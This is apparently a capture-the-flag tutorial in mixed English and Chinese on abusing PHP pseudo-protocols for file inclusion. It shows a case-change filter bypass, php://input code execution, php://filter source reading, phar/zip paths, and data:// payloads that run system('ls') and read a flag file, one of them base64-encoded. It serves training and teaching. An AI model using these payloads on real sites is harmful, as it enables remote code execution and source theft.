1. Pseudo-agreement
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流The following are examples of some of the more commonly used pseudo-protocols and their usage
1.1 php://input
It can be used to execute php code and submit our code through post request
Here is an example of Web_php_include in the offensive and defensive world
$page=str_replace("php://", "", $page); Here, the php:// in the page parameter is replaced with a space, we need to bypass it
Use php://input to execute the ls command to view the file, and php uses uppercase and lowercase to bypass
The results are as follows: (I have been failing to post in chrome, so this is the result of the post executed with the Firefox plug-in)
Wouldn't it be easy to know the file name, just post directly:
Get the flag:
1.2 php://filter
It is used to read source code and submit parameters through get request. It is a filter that can be used as an intermediate stream to filter other data streams. This protocol is usually used to read or write part of the data, and some filtering is performed on the data before reading and writing, such as base64 encoding processing, rot13 processing, etc.
name |
describe |
resource=<data stream to filter> |
This parameter is required. It specifies the data stream you want to filter |
read=<filtered list of read chains> |
This parameter is optional. One or more filter names can be set, separated by a pipe character (|) |
write=<filtered list of write chains> |
This parameter is optional. One or more filter names can be set, separated by a pipe character (|) |
<filtered list of two chains> |
Any filter list not prefixed with read= or write= is applied to the read or write chain as appropriate |
Common forms:
?a=php://filter/read=convert.base64/resource=xxx.php
iconv过滤器也就是对输入输出的数据进行一个编码转换,其格式为convert.iconv.<input-encoding>.<output-encoding>或者convert.iconv.<input-encoding>/<output-encoding>,表达的意思都是相同的,即将输入的字符串编码转换成输出指定的编码
例如:
?a=php://filter/read=convert.iconv.utf-8.utf-16/resource=xxx.php
即输入utf-8编码,输出utf-16编码
1.3 zip、phar伪协议
用于读取压缩包中的文件
常用格式:
/about.php?f=phar://./images/1499394959.jpg/1.php
/about.php?f=zip://./images/1499394959.jpg%231.php
1.4 file:// 文件协议
常用格式:
file://[本地文件系统的绝对路径]
例如:
?file=file://D:/Server/htdocs/emlog/phpinfo.txt
1.5 data协议
常用格式:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例如:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
依旧以上面那个ctf的题为例
直接使用data协议执行命令
?page=data://text/plain,<?php%20system("ls")?>
?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php")?>
拿到flag
